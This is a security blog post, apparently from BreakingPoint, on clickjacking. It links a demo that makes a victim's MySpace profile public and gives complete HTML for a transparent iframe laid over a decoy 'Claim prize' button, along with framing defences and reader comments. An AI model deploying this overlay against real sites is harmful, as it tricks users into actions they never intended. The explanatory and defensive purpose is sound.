UPDATE: In Spring of 2010 BreakingPoint unveiled the pioneering Cyber Tomography Machine to help you with problems such as the ones described in this post.
After Michal Zalewski's WHATWG post spilled enough beans to show definitively that yesterday's pop-up evaders weren't "clickjacking," I put together another demo this afternoon (link below), which uses a combination of opacity and z-index settings on an iframe. Again, it's just speculation.
http://www.planb-security.net/notclickjacking/iframetrick.html
This seems to fit the bill: no JavaScript required, it uses iframes, and it gives the ability to seemingly overlay one UI on top of another. The iframe holding the target page is made transparent with opacity and stacked above the attacker's decoy content with z-index, so the victim's clicks land on the framed page's controls while they appear to be interacting with the decoy. By the way, the demo is mostly harmless: it just turns your MySpace profile from private to public. I started down the path of masking my brokerage's trading app, but masking out keystrokes for stock orders seemed to be overkill for a simple speculative demo.
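To make the mechanism concrete, here is an added illustration of the opacity/z-index overlay. It is my own example, not the demo linked above or BreakingPoint's code; the target URL, the decoy layout and the pixel offsets are placeholders that would have to be tuned to whatever page is being framed:

```html
<!-- Added illustration of the opacity + z-index iframe overlay.
     Assumptions: https://target.example/... is a hypothetical framed page,
     and the negative offsets are placeholders chosen so that the target's
     real control ends up directly under the decoy button. -->
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Claim your prize</title>
<style>
  body { margin: 0; font-family: sans-serif; }

  /* Decoy UI: what the victim sees and believes they are clicking.
     It sits BELOW the iframe in the stacking order (z-index: 1). */
  #decoy {
    position: absolute; top: 0; left: 0;
    width: 400px; height: 300px;
    z-index: 1;
  }
  #decoy button {
    position: absolute; top: 120px; left: 100px;
    padding: 10px 20px;
  }

  /* Framed target: stacked ABOVE the decoy (z-index: 2) but fully
     transparent (opacity: 0). An invisible element still receives
     pointer events, so the click goes to the target page's control,
     not to the decoy button underneath. No script is involved.
     While lining things up, set opacity to 0.5 to see both layers. */
  #target {
    position: absolute;
    top: -200px;   /* placeholder offset: shifts the target's control */
    left: -350px;  /* so it lands exactly under #decoy button */
    width: 800px; height: 600px;
    border: 0;
    z-index: 2;
    opacity: 0;
  }
</style>
</head>
<body>
  <div id="decoy">
    <p>Click the button to claim your prize!</p>
    <button type="button">Claim prize</button>
  </div>

  <!-- The page whose control the attacker wants clicked, e.g. a
       "make my profile public" toggle. The victim must already be
       logged in there for the click to have any effect. -->
  <iframe id="target"
          src="https://target.example/settings/profile-visibility"></iframe>
</body>
</html>
```

Two practical caveats when testing a site against this. First, the attack depends on the target being frameable at all: the X-Frame-Options response header and, later, the Content-Security-Policy frame-ancestors directive, both introduced after this post was written, make modern browsers refuse to render the frame, so a site that sends either is not exposed to this particular overlay. Second, because the attacker's page needs no script, blocking JavaScript alone does not stop it; the NoScript behaviour described in the comments below works only because that extension also restricts iframes.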
scary
Fascinating stuff; it seems that extending browser capability always suffers from the "law" of unintended consequences. I just hope that by submitting this comment form I'm not changing my bank login name to admin@breakingpointsystems :P
Very scary indeed
Indeed scary!
It makes me even more glad I have NoScript installed and went a bit paranoid in the settings (for example, I had iframes disabled).
I went to the example with NoScript in my default internet-surfing mode. It was good to see that it was blocked! The interesting part was that I could see the action that was going to happen in a tooltip!
Thanks to the guys at BreakingPoint for pointing out these issues and providing (links to) real working examples.